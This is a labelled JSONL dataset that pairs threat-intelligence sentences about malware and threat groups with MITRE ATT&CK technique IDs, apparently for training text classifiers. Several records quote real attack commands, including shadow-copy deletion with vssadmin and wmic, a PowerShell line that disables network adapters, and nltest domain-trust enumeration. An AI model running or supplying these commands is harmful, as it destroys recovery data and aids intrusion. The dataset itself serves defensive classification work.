{"text1":"Small Sieve can only execute correctly if the word `Platypus` is passed to it on the command line.","labels":"['T1480']"}
{"text1":"Stuxnet checks for specific operating systems on 32-bit machines, Registry keys, and dates for vulnerabilities, and will exit execution if the values are not met.","labels":"['T1480']"}
{"text1":"Torisma is only delivered to a compromised host if the victim's IP address is on an allow-list.","labels":"['T1480']"}
{"text1":"VaporRage has the ability to check for the presence of a specific DLL and terminate if it is not found.","labels":"['T1480']"}
{"text1":"APT41 has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. APT41 has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number.","labels":"['T1480.001']"}
{"text1":"Equation has been observed utilizing environmental keying in payload delivery.","labels":"['T1480.001']"}
{"text1":"ROKRAT relies on a specific victim hostname to execute and decrypt important strings.","labels":"['T1480.001']"}
{"text1":"The Winnti for Windows dropper component can verify the existence of a single command line parameter and either terminate if it is not found or later use it as a decryption key.","labels":"['T1480.001']"}
{"text1":"Bazar can use Nltest tools to obtain information about the domain.","labels":"['T1482']"}
{"text1":"During C0015, the threat actors used the command `nltest \/domain_trusts \/all_trusts` to enumerate domain trusts.","labels":"['T1482']"}
{"text1":"Earth Lusca has used Nltest to obtain information about domain controllers.","labels":"['T1482']"}
{"text1":"FIN8 has retrieved a list of trusted domains by using \"Nltest.exe \/domain_trusts\".","labels":"['T1482']"}
{"text1":"Nltest may be used to enumerate trusted domains by using commands such as \"nltest \/domain_trusts\".","labels":"['T1482']"}
{"text1":"PoshC2 has modules for enumerating domain trusts.","labels":"['T1482']"}
{"text1":"PowerSploit has modules such as \"Get-NetDomainTrust\" and \"Get-NetForestTrust\" to enumerate domain and forest trusts.","labels":"['T1482']"}
{"text1":"QakBot can run \"nltest \/domain_trusts \/all_trusts\" for domain trust discovery.","labels":"['T1482']"}
{"text1":"TrickBot can gather information about domain trusts by utilizing Nltest.","labels":"['T1482']"}
{"text1":"UNC2452 used the \"Get-AcceptedDomain\" PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell. They also used AdFind to enumerate domains and to discover trust between federated domains.","labels":"['T1482']"}
{"text1":"dsquery can be used to gather information on domain trusts with \"dsquery * -filter \"(objectClass=trustedDomain)\" -attr *\".","labels":"['T1482']"}
{"text1":"Empire can use \"New-GPOImmediateTask\" to modify a GPO that will install and execute a malicious Scheduled Task\/Job.","labels":"['T1484.001']"}
{"text1":"HermeticWiper has the ability to deploy through an infected system's default domain policy.","labels":"['T1484.001']"}
{"text1":"AADInternals can create a backdoor by converting a domain to a federated domain which will be able to authenticate any user across the tenant. AADInternals can also modify DesktopSSO information.","labels":"['T1484.002']"}
{"text1":"APT38 has used a custom secure delete function to make deleted files unrecoverable.","labels":"['T1485']"}
{"text1":"BlackEnergy 2 contains a \"Destroy\" plug-in that destroys data stored on victim hard drives by overwriting file contents.","labels":"['T1485']"}
{"text1":"CaddyWiper can work alphabetically through drives on a compromised system to take ownership of and overwrite all files.","labels":"['T1485']"}
{"text1":"HermeticWiper can recursively wipe folders and files in `Windows`, `Program Files`, `Program Files(x86)`, `PerfLogs`, `Boot, System`, `Volume Information`, and `AppData` folders using `FSCTL_MOVE_FILE`. HermeticWiper can also overwrite symbolic links and big files in `My Documents` and on the Desktop with random bytes.","labels":"['T1485']"}
{"text1":"Industroyer\u2019s data wiper module clears registry keys and overwrites both ICS configuration and Windows files.","labels":"['T1485']"}
{"text1":"Kazuar can overwrite files with random data before deleting them.","labels":"['T1485']"}
{"text1":"Meteor can fill a victim's files and directories with zero-bytes in replacement of real content before deleting them.","labels":"['T1485']"}
{"text1":"Olympic Destroyer overwrites files locally and on remote shares.","labels":"['T1485']"}
{"text1":"REvil has the capability to destroy files and folders.","labels":"['T1485']"}
{"text1":"RawDisk was used in Shamoon to write to protected system locations such as the MBR and disk partitions in an effort to destroy data.","labels":"['T1485']"}
{"text1":"Sandworm Team has used the BlackEnergy KillDisk component to overwrite files on Windows-based Human-Machine Interfaces.","labels":"['T1485']"}
{"text1":"Shamoon attempts to overwrite operating system files and disk structures with image files. In a later variant, randomly generated data was used for data overwrites.","labels":"['T1485']"}
{"text1":"APT38 has used Hermes ransomware to encrypt files with AES256.","labels":"['T1486']"}
{"text1":"Avaddon encrypts the victim system using a combination of AES256 and RSA encryption schemes.","labels":"['T1486']"}
{"text1":"BitPaymer can import a hard-coded RSA 1024-bit public key, generate a 128-bit RC4 key for each file, and encrypt the file in place, appending \".locked\" to the filename.","labels":"['T1486']"}
{"text1":"Clop can encrypt files using AES, RSA, and RC4 and will add the \".clop\" extension to encrypted files.","labels":"['T1486']"}
{"text1":"Conti can use \"CreateIoCompletionPort()\", \"PostQueuedCompletionStatus()\", and \"GetQueuedCompletionPort()\" to rapidly encrypt files, excluding those with the extensions of .exe, .dll, and .lnk. It has used a different AES-256 encryption key per file with a bundled RAS-4096 public encryption key that is unique for each victim. Conti can use \u201cWindows Restart Manager\u201d to ensure files are unlocked and open for encryption.","labels":"['T1486']"}
{"text1":"Cuba has the ability to encrypt system data and add the \".cuba\" extension to encrypted files.","labels":"['T1486']"}
{"text1":"DEATHRANSOM can use public and private key pair encryption to encrypt files for ransom payment.","labels":"['T1486']"}
{"text1":"Diavol has encrypted files using an RSA key though the `CryptEncrypt` API and has appended filenames with \".lock64\".","labels":"['T1486']"}
{"text1":"EKANS uses standard encryption library functions to encrypt files.","labels":"['T1486']"}
{"text1":"Egregor can encrypt all non-system files using a hybrid AES-RSA algorithm prior to displaying a ransom note.","labels":"['T1486']"}
{"text1":"HELLOKITTY can use an embedded RSA-2048 public key to encrypt victim data for ransom.","labels":"['T1486']"}
{"text1":"Indrik Spider has encrypted domain-controlled systems using BitPaymer.","labels":"['T1486']"}
{"text1":"JCry has encrypted files and demanded Bitcoin to decrypt those files.","labels":"['T1486']"}
{"text1":"LockerGoga has encrypted files, including core Windows OS files, using RSA-OAEP MGF1 and then demanded Bitcoin be paid for the decryption key.","labels":"['T1486']"}
{"text1":"Maze has disrupted systems by encrypting files on targeted machines, claiming to decrypt files if a ransom payment is made. Maze has used the ChaCha algorithm, based on Salsa20, and an RSA algorithm to encrypt files.","labels":"['T1486']"}
{"text1":"MegaCortex has used the open-source library, Mbed Crypto, and generated AES keys to carry out the file encryption process.","labels":"['T1486']"}
{"text1":"Netwalker can encrypt files on infected machines to extort victims.","labels":"['T1486']"}
{"text1":"Pay2Key can encrypt data on victim's machines using RSA and AES algorithms in order to extort a ransom payment for decryption.","labels":"['T1486']"}
{"text1":"REvil can encrypt files on victim systems and demands a ransom to decrypt the files.","labels":"['T1486']"}
{"text1":"RobbinHood will search for an RSA encryption key and then perform its encryption process on the system files.","labels":"['T1486']"}
{"text1":"Ryuk has used a combination of symmetric (AES) and asymmetric (RSA) encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of .RYK. Encrypted directories have had a ransom note of RyukReadMe.txt written to the directory.","labels":"['T1486']"}
{"text1":"SamSam encrypts victim files using RSA-2048 encryption and demands a ransom be paid in Bitcoin to decrypt those files.","labels":"['T1486']"}
{"text1":"Shamoon has an operational mode for encrypting data instead of overwriting it.","labels":"['T1486']"}
{"text1":"SynAck encrypts the victims machine followed by asking the victim to pay a ransom.","labels":"['T1486']"}
{"text1":"TA505 has used a wide variety of ransomware, such as Clop, Locky, Jaff, Bart, Philadelphia, and GlobeImposter, to encrypt victim files and demand a ransom payment.","labels":"['T1486']"}
{"text1":"ThiefQuest encrypts a set of file extensions on a host, deletes the original files, and provides a ransom note with no contact information.","labels":"['T1486']"}
{"text1":"WannaCry encrypts user files and demands that a ransom be paid in Bitcoin to decrypt those files.","labels":"['T1486']"}
{"text1":"XCSSET performs AES-CBC encryption on files under \"~\/Documents\", \"~\/Downloads\", and\n\"~\/Desktop\" with a fixed key and renames files to give them a \".enc\" extension. Only files with sizes \nless than 500MB are encrypted.","labels":"['T1486']"}
{"text1":"Xbash has maliciously encrypted victim's database systems and demanded a cryptocurrency ransom be paid.","labels":"['T1486']"}
{"text1":"Babuk can stop specific services related to backups.","labels":"['T1489']"}
{"text1":"Conti can stop up to 146 Windows services related to security, backup, database, and email solutions through the use of \"net stop\".","labels":"['T1489']"}
{"text1":"Diavol will terminate services using the Service Control Manager (SCM) API.","labels":"['T1489']"}
{"text1":"Indrik Spider has used PsExec to stop services prior to the execution of ransomware.","labels":"['T1489']"}
{"text1":"Industroyer\u2019s data wiper module writes zeros into the registry keys in \"SYSTEM\\CurrentControlSet\\Services\" to render a system inoperable.","labels":"['T1489']"}
{"text1":"Lazarus Group has stopped the MSExchangeIS service to render Exchange contents inaccessible to users.","labels":"['T1489']"}
{"text1":"LookBack can kill processes and delete services.","labels":"['T1489']"}
{"text1":"Maze has stopped SQL services to ensure it can encrypt any database.","labels":"['T1489']"}
{"text1":"MegaCortex can stop and disable services on the system.","labels":"['T1489']"}
{"text1":"Meteor can disconnect all network adapters on a compromised host using `powershell -Command \"Get-WmiObject -class Win32_NetworkAdapter | ForEach { If ($.NetEnabled) { $.Disable() } }\" > NUL`.","labels":"['T1489']"}
{"text1":"Netwalker can terminate system processes and services, some of which relate to backup software.","labels":"['T1489']"}
{"text1":"Olympic Destroyer uses the API call \"ChangeServiceConfigW\" to disable all services on the affected system.","labels":"['T1489']"}
{"text1":"Pay2Key can stop the MS SQL service at the end of the encryption process to release files locked by the service.","labels":"['T1489']"}
{"text1":"REvil has the capability to stop services and kill processes.","labels":"['T1489']"}
{"text1":"Ragnar Locker has attempted to stop services associated with business applications and databases to release the lock on files used by these applications so they may be encrypted.","labels":"['T1489']"}
{"text1":"RobbinHood stops 181 Windows services on the system before beginning the encryption process.","labels":"['T1489']"}
{"text1":"WannaCry attempts to kill processes associated with Exchange, Microsoft SQL Server, and MySQL to make it possible to encrypt their data stores.","labels":"['T1489']"}
{"text1":"Wizard Spider has used taskkill.exe and net.exe to stop backup, catalog, cloud, and other services prior to network encryption.","labels":"['T1489']"}
{"text1":"Avaddon deletes backups and shadow copies using native system tools.","labels":"['T1490']"}
{"text1":"Babuk has the ability to delete shadow volumes using \"vssadmin.exe delete shadows \/all \/quiet\".","labels":"['T1490']"}
{"text1":"Conti can delete Windows Volume Shadow Copies using \"vssadmin\".","labels":"['T1490']"}
{"text1":"DEATHRANSOM can delete volume shadow copies on compromised hosts.","labels":"['T1490']"}
{"text1":"DarkWatchman can delete shadow volumes using \"vssadmin.exe\".","labels":"['T1490']"}
{"text1":"EKANS removes backups of Volume Shadow Copies to disable any restoration capabilities.","labels":"['T1490']"}
{"text1":"HELLOKITTY can delete volume shadow copies on compromised hosts.","labels":"['T1490']"}
{"text1":"InvisiMole can can remove all system restore points.","labels":"['T1490']"}
{"text1":"JCry has been observed deleting shadow copies to ensure that data cannot be restored easily.","labels":"['T1490']"}
{"text1":"Meteor can use `bcdedit` to delete different boot identifiers on a compromised host; it can also use `vssadmin.exe delete shadows \/all \/quiet` and `C:\\\\Windows\\\\system32\\\\wbem\\\\wmic.exe shadowcopy delete`.","labels":"['T1490']"}
{"text1":"Netwalker can delete the infected system's Shadow Volumes to prevent recovery.","labels":"['T1490']"}
{"text1":"ProLock can use vssadmin.exe to remove volume shadow copies.","labels":"['T1490']"}
{"text1":"Pysa has the functionality to delete shadow copies.","labels":"['T1490']"}
{"text1":"RobbinHood deletes shadow copies to ensure that all the data cannot be restored easily.","labels":"['T1490']"}
{"text1":"Ryuk has used \"vssadmin Delete Shadows \/all \/quiet\" to to delete volume shadow copies and \"vssadmin resize shadowstorage\" to force deletion of shadow copies created by third-party applications.","labels":"['T1490']"}
{"text1":"WannaCry uses \"vssadmin\", \"wbadmin\", \"bcdedit\", and \"wmic\" to delete and disable operating system recovery features.","labels":"['T1490']"}
{"text1":"WastedLocker can delete shadow volumes.","labels":"['T1490']"}
{"text1":"After encryption, Diavol will capture the desktop background window, set the background color to black, and change the desktop wallpaper to a newly created bitmap image with the text \u201cAll your files are encrypted! For more information see \u201cREADME-FOR-DECRYPT.txt\".","labels":"['T1491.001']"}
{"text1":"Gamaredon Group has left taunting images and messages on the victims' desktops as proof of system access.","labels":"['T1491.001']"}
{"text1":"Sandworm Team defaced approximately 15,000 websites belonging to Georgian government, non-government, and private sector organizations in 2019.","labels":"['T1491.002']"}
{"text1":"Bad Rabbit has used an executable that installs a modified bootloader to prevent normal boot-up.","labels":"['T1495']"}
{"text1":"APT41 deployed a Monero cryptocurrency mining tool in a victim\u2019s environment.","labels":"['T1496']"}
{"text1":"CookieMiner has loaded coinmining software onto systems to mine for Koto cryptocurrency.","labels":"['T1496']"}
{"text1":"Hildegard has used xmrig to mine cryptocurrency.","labels":"['T1496']"}
{"text1":"Imminent Monitor has the capability to run a cryptocurrency miner on the victim machine.","labels":"['T1496']"}
{"text1":"Kinsing has created and run a Bitcoin cryptocurrency miner.","labels":"['T1496']"}
{"text1":"Lazarus Group has subset groups like Bluenoroff who have used cryptocurrency mining software on victim machines.","labels":"['T1496']"}
{"text1":"LoudMiner harvested system resources to mine cryptocurrency, using XMRig to mine Monero.","labels":"['T1496']"}
{"text1":"Lucifer can use system resources to mine cryptocurrency, dropping XMRig to mine Monero.","labels":"['T1496']"}
{"text1":"Rocke has distributed cryptomining malware.","labels":"['T1496']"}
{"text1":"Skidmap is a kernel-mode rootkit used for cryptocurrency mining.","labels":"['T1496']"}
{"text1":"TeamTNT has deployed XMRig Docker images to mine cryptocurrency. TeamTNT has also infected Docker containers and Kubernetes clusters with XMRig, and used RainbowMiner and lolMiner for mining cryptocurrency.","labels":"['T1496']"}
{"text1":"Agent Tesla has he ability to perform anti-sandboxing and anti-virtualization checks.","labels":"['T1497']"}
{"text1":"Bumblebee has the ability to perform anti-virtualization checks.","labels":"['T1497']"}
{"text1":"CHOPSTICK  includes runtime checks to identify an analysis environment and prevent execution on it.","labels":"['T1497']"}
{"text1":"Carberp has removed various hooks before installing the trojan or bootkit to evade sandbox analysis or other analysis software.","labels":"['T1497']"}
{"text1":"Darkhotel malware has employed just-in-time decryption of strings to evade sandbox detection.","labels":"['T1497']"}
{"text1":"During Operation Spalax, the threat actors used droppers that would run anti-analysis checks before executing malware on a compromised host.","labels":"['T1497']"}
{"text1":"Gelsemium can use junk code to generate random activity to obscure malware behavior.","labels":"['T1497']"}
{"text1":"HAWKBALL has methods to check if the process the malware uses is being debugged.","labels":"['T1497']"}
{"text1":"Kevin can sleep for a time interval between C2 communication attempts.","labels":"['T1497']"}
{"text1":"Lucifer can crash a debugger by passing a format string to \"OutputDebugStringA()\".","labels":"['T1497']"}
{"text1":"Metamorfo has embedded a \"vmdetect.exe\" executable to identify virtual machines at the beginning of execution.","labels":"['T1497']"}
{"text1":"Pteranodon has the ability to use anti-detection functions to identify sandbox environments.","labels":"['T1497']"}
{"text1":"Some versions of CozyCar will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. If it detects that it is, it will exit.","labels":"['T1497']"}
{"text1":"The White Company has performed anti-analysis checks to determine if its malware was in a debugging environment.","labels":"['T1497']"}
{"text1":"Attor can detect whether it is executed in some virtualized or emulated environment by searching for specific artifacts, such as communication with I\/O ports and using VM-specific instructions.","labels":"['T1497.001']"}
{"text1":"BadPatch attempts to detect if it is being run in a Virtual Machine (VM) using a WMI query for disk drive name, BIOS, and motherboard information.","labels":"['T1497.001']"}
{"text1":"Bumblebee has the ability to search for designated file paths and Registry keys that indicate a virtualized environment from multiple products.","labels":"['T1497.001']"}
{"text1":"Darkhotel malware has used a series of checks to determine if it's being analyzed; checks include the length of executable names, if a filename ends with \".Md5.exe\", and if the program is executed from the root of the C:\\ drive, as well as checks for sandbox-related libraries.","labels":"['T1497.001']"}
{"text1":"Denis ran multiple system checks, looking for processor and register characteristics, to evade emulation and analysis.","labels":"['T1497.001']"}
{"text1":"During Frankenstein, the threat actors used a script that ran WMI queries to check if a VM or sandbox was running, including VMWare and Virtualbox. The script would also call WMI to determine the number of cores allocated to the system; if less than two the script would stop execution.","labels":"['T1497.001']"}
{"text1":"Dyre can detect sandbox analysis environments by inspecting the process list and Registry.","labels":"['T1497.001']"}
{"text1":"EvilBunny's dropper has checked the number of processes and the length and strings of its own file name to identify if the malware is in a sandbox environment.","labels":"['T1497.001']"}
{"text1":"Evilnum has used a component called TerraLoader to check certain hardware and file information to detect sandboxed environments.","labels":"['T1497.001']"}
{"text1":"Ferocious can run anti-sandbox checks using the Microsoft Excel 4.0 function \"GET.WORKSPACE\" to determine the OS version, if there is a mouse present, and if the host is capable of playing sounds.","labels":"['T1497.001']"}
{"text1":"FinFisher obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list in order to check for sandbox\/virtualized environments.","labels":"['T1497.001']"}
{"text1":"Frankenstein has used WMI queries to check if various security applications were running, including VMWare and Virtualbox.","labels":"['T1497.001']"}
{"text1":"GoldMax will check if it is being run in a virtualized environment by comparing the collected MAC address to \"c8:27:cc:c2:37:5a\".","labels":"['T1497.001']"}
{"text1":"Grandoreiro can detect VMWare via its I\/O port and Virtual PC via the \"vpcext\" instruction.","labels":"['T1497.001']"}
{"text1":"GuLoader has the ability to perform anti-VM and anti-sandbox checks using string hashing, the API call \"EnumWindows\", and checking for Qemu guest agent.","labels":"['T1497.001']"}
{"text1":"InvisiMole can check for artifacts of VirtualBox, Virtual PC and VMware environment, and terminate itself if they are detected.","labels":"['T1497.001']"}
{"text1":"Lazarus Group has used tools to detect sandbox or VMware services through identifying the presence of a debugger or related services.","labels":"['T1497.001']"}
{"text1":"Lucifer can check for specific usernames, computer names, device drivers, DLL's, and virtual devices associated with sandboxed environments and can enter an infinite loop and stop itself if any are detected.","labels":"['T1497.001']"}
{"text1":"MegaCortex has checked the number of CPUs in the system to avoid being run in a sandbox or emulator.","labels":"['T1497.001']"}
{"text1":"NativeZone has checked if Vmware or VirtualBox VM is running on a compromised host.","labels":"['T1497.001']"}
{"text1":"OSX_OCEANLOTUS.D has variants that check a number of system parameters to see if it is being run on real hardware or in a virtual machine environment, such as \"sysctl hw.model\".","labels":"['T1497.001']"}
{"text1":"OilRig has used macros to verify if a mouse is connected to a compromised machine.","labels":"['T1497.001']"}
{"text1":"Okrum's loader can check the amount of physical memory and terminates itself if the host has less than 1.5 Gigabytes of physical memory in total.","labels":"['T1497.001']"}
{"text1":"PlugX checks if VMware tools is running in the background by searching for any process named \"vmtoolsd\".","labels":"['T1497.001']"}
{"text1":"PoetRAT checked the size of the hard drive to determine if it was being run in a sandbox environment. In the event of sandbox detection, it would delete itself by overwriting the malware scripts with the contents of \"License.txt\" and exiting.","labels":"['T1497.001']"}
{"text1":"Pupy has a module that checks a number of indicators on the system to determine if its running on a virtual machine.","labels":"['T1497.001']"}
{"text1":"QakBot can check the compromised host for the presence of multiple executables associated with analysis tools and halt execution if any are found.","labels":"['T1497.001']"}
{"text1":"ROKRAT can check for VMware-related files and DLLs related to sandboxes.","labels":"['T1497.001']"}
{"text1":"Remcos searches for Sandboxie and VMware on the system.","labels":"['T1497.001']"}
{"text1":"Smoke Loader scans processes to perform anti-VM checks.","labels":"['T1497.001']"}
{"text1":"UBoatRAT checks for virtualization software such as VMWare, VirtualBox, or QEmu on the compromised machine.","labels":"['T1497.001']"}
{"text1":"WastedLocker checked if UCOMIEnumConnections and IActiveScriptParseProcedure32 Registry keys were detected as part of its anti-analysis technique.","labels":"['T1497.001']"}
{"text1":"WhisperGate can stop its execution when it recognizes the presence of certain monitoring tools.","labels":"['T1497.001']"}
{"text1":"macOS.OSAMiner can parse the output of the native `system_profiler` tool to determine if the machine is running with 4 cores.","labels":"['T1497.001']"}
{"text1":"yty has some basic anti-sandbox detection that tries to detect Virtual PC, Sandboxie, and VMware.","labels":"['T1497.001']"}
{"text1":"Darkhotel has used malware that repeatedly checks the mouse cursor position to determine if a real user is on the system.","labels":"['T1497.002']"}
{"text1":"FIN7 used images embedded into document lures that only activate the payload when a user double clicks to avoid sandboxes.","labels":"['T1497.002']"}
{"text1":"Okrum loader only executes the payload after the left mouse button has been pressed at least three times, in order to avoid being executed within virtualized or emulated environments.","labels":"['T1497.002']"}
{"text1":"After initial installation, Raindrop runs a computation to delay execution.","labels":"['T1497.003']"}
{"text1":"AppleJeus has waited a specified time before downloading a second stage payload.","labels":"['T1497.003']"}
{"text1":"BADFLICK has delayed communication to the actor-controlled IP address by 5 minutes.","labels":"['T1497.003']"}
{"text1":"Bazar can use a timer to delay execution of core functionality.","labels":"['T1497.003']"}
{"text1":"BendyBear can check for analysis environments and signs of debugging using the Windows API \"kernel32!GetTickCountKernel32\" call.","labels":"['T1497.003']"}
{"text1":"Bisonal has checked if the malware is running in a virtual environment with the anti-debug function GetTickCount() to compare the timing.","labels":"['T1497.003']"}
{"text1":"Clambling can wait 30 minutes before initiating contact with C2.","labels":"['T1497.003']"}
{"text1":"Crimson can determine when it has been installed on a host for at least 15 days before downloading the final payload.","labels":"['T1497.003']"}
{"text1":"Egregor can perform a  long sleep (greater than or equal to 3 minutes) to evade detection.","labels":"['T1497.003']"}
{"text1":"FatDuke can turn itself on or off at random intervals.","labels":"['T1497.003']"}
{"text1":"GrimAgent can sleep for 195 - 205 seconds after payload execution and before deleting its task.","labels":"['T1497.003']"}
{"text1":"HermeticWiper has the ability to receive a command parameter to sleep prior to carrying out destructive actions on a targeted host.","labels":"['T1497.003']"}
{"text1":"LiteDuke can wait 30 seconds before executing additional code if security software is detected.","labels":"['T1497.003']"}
{"text1":"P8RAT has the ability to \"sleep\" for a specified time to evade detection.","labels":"['T1497.003']"}
{"text1":"Pony has delayed execution using a built-in function to avoid detection and analysis.","labels":"['T1497.003']"}
{"text1":"SUNBURST remained dormant after initial access for a period of up to two weeks.","labels":"['T1497.003']"}
{"text1":"Saint Bot has used the command `timeout 20` to pause the execution of its initial loader.","labels":"['T1497.003']"}
{"text1":"SodaMaster has the ability to put itself to \"sleep\" for a specified time.","labels":"['T1497.003']"}
{"text1":"The QakBot dropper can delay dropping the payload to evade detection.","labels":"['T1497.003']"}
{"text1":"ThiefQuest invokes \"time\" call to check the system's time, executes a \"sleep\" command, invokes a second \"time\" call, and then compares the time difference between the two \"time\" calls and the amount of time the system slept to identify the sandbox.","labels":"['T1497.003']"}
{"text1":"TrickBot has used \"printf\" and file I\/O loops to delay process execution as part of API hammering.","labels":"['T1497.003']"}
{"text1":"Using the machine's local time, XCSSET waits 43200 seconds (12 hours) from the initial creation timestamp of a specific file, \".report\". After the elapsed time, XCSSET executes additional modules.","labels":"['T1497.003']"}
{"text1":"WhisperGate can pause for 20 seconds to bypass antivirus solutions.","labels":"['T1497.003']"}
{"text1":"OnionDuke has the capability to use a Denial of Service module.","labels":"['T1499']"}
{"text1":"Sandworm Team temporarily disrupted service to Georgian government, non-government, and private sector websites after compromising a Georgian web hosting provider in 2019.","labels":"['T1499']"}
{"text1":"ZxShell has a feature to perform SYN flood attack on a host.","labels":"['T1499']"}
{"text1":"Industroyer uses a custom DoS tool that leverages CVE-2015-5374 and targets hardcoded IP addresses of Siemens SIPROTEC devices.","labels":"['T1499.004']"}
{"text1":"Sandworm Team has used various MS-SQL stored procedures.","labels":"['T1505.001']"}
{"text1":"Stuxnet used xp_cmdshell to store and execute SQL code.","labels":"['T1505.001']"}
{"text1":"LightNeuron has used a malicious Microsoft Exchange transport agent for persistence.","labels":"['T1505.002']"}
{"text1":"APT28 has used a modified and obfuscated version of the reGeorg web shell to maintain persistence on a target's Outlook Web Access (OWA) server.","labels":"['T1505.003']"}
{"text1":"APT29 has installed web shells on exploited Microsoft Exchange servers.","labels":"['T1505.003']"}
{"text1":"APT32 has used Web shells to maintain access to victim websites.","labels":"['T1505.003']"}
{"text1":"APT38 has used web shells for persistence or to ensure redundant access.","labels":"['T1505.003']"}
{"text1":"APT39 has installed ANTAK and ASPXSPY web shells.","labels":"['T1505.003']"}
{"text1":"ASPXSpy is a Web shell. The ASPXTool version used by Threat Group-3390 has been deployed to accessible servers running Internet Information Services (IIS).","labels":"['T1505.003']"}
{"text1":"BackdoorDiplomacy has used web shells to establish an initial foothold and for lateral movement within a victim's system.","labels":"['T1505.003']"}
{"text1":"China Chopper's server component is a Web Shell payload.","labels":"['T1505.003']"}
{"text1":"Dragonfly has commonly created Web shells on victims' publicly accessible email and web servers, which they used to maintain access to a victim network and download additional malicious files.","labels":"['T1505.003']"}
{"text1":"During Operation Wocao, threat actors used their own web shells, as well as those previously placed on target systems by other threat actors, for reconnaissance and lateral movement.","labels":"['T1505.003']"}
{"text1":"GALLIUM used Web shells to persist in victim environments and assist in execution and exfiltration.","labels":"['T1505.003']"}
{"text1":"HAFNIUM has deployed multiple web shells on compromised servers including SIMPLESEESHARP, SPORTSBALL, China Chopper, and ASPXSpy.","labels":"['T1505.003']"}
{"text1":"Kimsuky has used modified versions of open source PHP web shells to maintain access, often adding \"Dinosaur\" references within the code.","labels":"['T1505.003']"}
{"text1":"Leviathan relies on web shells for an initial foothold as well as persistence into the victim's systems.","labels":"['T1505.003']"}
{"text1":"Moses Staff has dropped a web shell onto a compromised system.","labels":"['T1505.003']"}
{"text1":"OilRig has used web shells, often to maintain access to a victim network.","labels":"['T1505.003']"}
{"text1":"OwaAuth is a Web shell that appears to be exclusively used by Threat Group-3390. It is installed as an ISAPI filter on Exchange servers and shares characteristics with the China Chopper Web shell.","labels":"['T1505.003']"}
{"text1":"P.A.S. Webshell can gain remote access and execution on target web servers.","labels":"['T1505.003']"}
{"text1":"SUPERNOVA is a Web shell.","labels":"['T1505.003']"}
{"text1":"Sandworm Team has used webshells including P.A.S. Webshell to maintain access to victim networks.","labels":"['T1505.003']"}
{"text1":"TEMP.Veles has planted Web shells on Outlook Exchange servers.","labels":"['T1505.003']"}
{"text1":"Threat Group-3390 has used a variety of Web shells.","labels":"['T1505.003']"}
{"text1":"Tonto Team has used a first stage web shell after compromising a vulnerable Exchange server.","labels":"['T1505.003']"}
{"text1":"Tropic Trooper has started a web service in the target host and wait for the adversary to connect, acting as a web shell.","labels":"['T1505.003']"}
{"text1":"IceApple is an IIS post-exploitation framework, consisting of 18 modules that provide several functionalities.","labels":"['T1505.004']"}
{"text1":"RGDoor establishes persistence on webservers as an IIS module.","labels":"['T1505.004']"}
{"text1":"Bazar can query the Registry for installed applications.","labels":"['T1518']"}
{"text1":"CharmPower can list the installed applications on a compromised host.","labels":"['T1518']"}
{"text1":"ComRAT can check the victim's default browser to determine which process to inject its communications module into.","labels":"['T1518']"}
{"text1":"Dridex has collected a list of installed software on the system.","labels":"['T1518']"}
{"text1":"During Operation Dust Storm, the threat actors deployed a file called `DeployJava.js` to fingerprint installed software on a victim system prior to exploit delivery.","labels":"['T1518']"}
{"text1":"During Operation Wocao, threat actors collected a list of installed software on the infected system.","labels":"['T1518']"}
{"text1":"HEXANE has enumerated programs installed on an infected machine.","labels":"['T1518']"}
{"text1":"HotCroissant can retrieve a list of applications from the \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\" registry key.","labels":"['T1518']"}
{"text1":"Inception has enumerated installed software on compromised systems.","labels":"['T1518']"}
{"text1":"InvisiMole can collect information about installed software used by specific users, software executed on user login, and software executed by each system.","labels":"['T1518']"}
{"text1":"KGH_SPY can collect information on installed applications.","labels":"['T1518']"}
{"text1":"MarkiRAT can check for the Telegram installation directory by enumerating the files on disk.","labels":"['T1518']"}
{"text1":"Metamorfo has searched the compromised system for banking applications.","labels":"['T1518']"}
{"text1":"MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine.","labels":"['T1518']"}
{"text1":"P.A.S. Webshell can list PHP server configuration details.","labels":"['T1518']"}
{"text1":"QakBot can enumerate a list of installed programs.","labels":"['T1518']"}
{"text1":"RTM can scan victim drives to look for specific banking software on the machine to determine next actions.","labels":"['T1518']"}
{"text1":"SUGARDUMP can identify Chrome, Opera, Edge Chromium, and Firefox browsers, including version number, on a compromised host.","labels":"['T1518']"}
{"text1":"Siloscape searches for the kubectl binary.","labels":"['T1518']"}
{"text1":"TajMahal has the ability to identify the Internet Explorer (IE) version on an infected host.","labels":"['T1518']"}
{"text1":"The Cobalt Strike System Profiler can discover applications through the browser and identify the version of Java the target has.","labels":"['T1518']"}
{"text1":"Tropic Trooper's backdoor could list the infected system's installed software.","labels":"['T1518']"}
{"text1":"Windigo has used a script to detect installed software on targeted systems.","labels":"['T1518']"}
{"text1":"Windshift has used malware to identify installed software.","labels":"['T1518']"}
{"text1":"XCSSET uses \"ps aux\" with the \"grep\" command to enumerate common browsers and system processes potentially impacting XCSSET's exfiltration capabilities.","labels":"['T1518']"}
{"text1":"down_new has the ability to gather information on installed applications.","labels":"['T1518']"}
{"text1":"ABK has the ability to identify the installed anti-virus product on the compromised host.","labels":"['T1518.001']"}
{"text1":"APT38 has identified security software, configurations, defensive tools, and sensors installed on a compromised system.","labels":"['T1518.001']"}
{"text1":"Action RAT can identify AV products on an infected host using the following command: `cmd.exe WMIC \/Node:localhost \/Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName \/Format:List`.","labels":"['T1518.001']"}
{"text1":"Amadey has checked for a variety of antivirus products.","labels":"['T1518.001']"}
{"text1":"Aquatic Panda has attempted to discover third party endpoint detection and response (EDR) tools on compromised systems.","labels":"['T1518.001']"}
{"text1":"Astaroth checks for the presence of Avast antivirus in the \"C:\\Program\\Files\\\" folder.","labels":"['T1518.001']"}
{"text1":"AuTo Stealer has the ability to collect information about installed AV products from an infected host.","labels":"['T1518.001']"}
{"text1":"BLUELIGHT can collect a list of anti-virus products installed on a machine.","labels":"['T1518.001']"}
{"text1":"Bazar can identify the installed antivirus engine.","labels":"['T1518.001']"}
{"text1":"CHOPSTICK checks for antivirus and forensics software.","labels":"['T1518.001']"}
{"text1":"Clop can search for processes with antivirus and antimalware product names.","labels":"['T1518.001']"}
